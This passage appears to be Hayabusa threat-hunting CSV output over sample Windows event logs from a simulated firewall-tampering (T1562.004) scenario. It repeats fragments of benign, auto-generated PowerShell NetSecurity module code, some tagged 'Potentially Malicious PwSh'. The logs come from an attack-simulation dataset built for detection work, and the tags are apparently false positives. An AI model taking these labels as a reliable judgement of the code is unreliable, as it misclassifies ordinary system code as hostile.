-is",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 